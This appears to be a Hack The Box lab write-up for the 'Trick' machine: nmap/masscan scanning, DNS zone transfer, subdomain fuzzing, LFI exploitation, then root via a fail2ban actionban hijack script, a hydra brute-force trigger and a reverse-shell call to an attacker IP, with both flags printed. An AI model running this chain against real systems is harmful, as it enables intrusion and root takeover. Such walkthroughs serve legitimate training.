Information Gathering

$ ip='10.10.11.166'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61ff293b36bd9dacfbde1f56884cae2d (RSA)
|   256 9ecdf2406196ea21a6ce2602af759a78 (ECDSA)
|_  256 7293f91158de34ad12b54b4a7364b970 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Reverse DNS Lookup

$ dig @10.10.11.166 -x 10.10.11.166

# echo '10.10.11.166 trick.htb'>>/etc/hosts

http://trick.htb/

$ dig axfr @10.10.11.166 trick.htb

# echo '10.10.11.166 preprod-payroll.trick.htb'>>/etc/hosts

Marketing LFI && Pany

$ ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-20000.txt -u http://trick.htb -H "Host:preprod-FUZZ.trick.htb" -ac

# echo '10.10.11.166 preprod-marketing.trick.htb'>>/etc/hosts

$ arjun -u 'http://preprod-marketing.trick.htb'

https://github.com/MartinxMax/pany

$ python3 pany.py -u 'http://preprod-marketing.trick.htb?page=*'

User.txt

10c468007a6adfbd703fcfb4f253bb91

Privilege Escalation:fail2ban actionban && Tyrant

$ cd /etc/fail2ban
$ cd action.d

$ cat iptables-multiport.conf

由于属于security组,可以对该目录文件进行移动添加

https://github.com/MartinxMax/Tyrant

将tyrant保存到/tmp

#!/bin/bash
# run.sh

echo "Waiting for the file to exist..."
while [[ ! -f /etc/fail2ban/action.d/iptables-multiport.conf ]]; do
    sleep 0.1
done

echo "Backing up the original file..."
mv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak

cp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf

echo "[+] Modifying the file..."
sed -i -e "s|actionban = .*|actionban = /tmp/tyrant|g" \
       -e "s|actionunban = .*|actionunban = /tmp/tyrant|g" \
       /etc/fail2ban/action.d/iptables-multiport.conf

echo "[*] Changing file permissions..."
chmod 666 /etc/fail2ban/action.d/iptables-multiport.conf

echo "[+] Restarting fail2ban service..."
sudo -u root /etc/init.d/fail2ban restart

if [[ $? -ne 0 ]]; then
    echo "[-] Fail2ban restart failed. Exiting."
    exit 1
fi

echo "[*] Monitoring /tmp/tyrant for SUID permission..."
while true; do
    if [[ -u /tmp/tyrant ]]; then
        echo "[+] Successfully detected SUID on /tmp/tyrant. Exiting."
        exit 0
    fi
    sleep 0.5
done

$ ./run.sh

攻击端持续发送载荷到22端口触发actionban

$ hydra -l root -P /home/maptnh/Desktop/rockyou.txt 10.10.11.166 ssh -t 4 -vV

$ /tmp/tyrant -uid 0 -rhost 10.10.16.33 -rport 4443

Root.txt

ce2824dc567a34aa0e509ddb8337782b

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）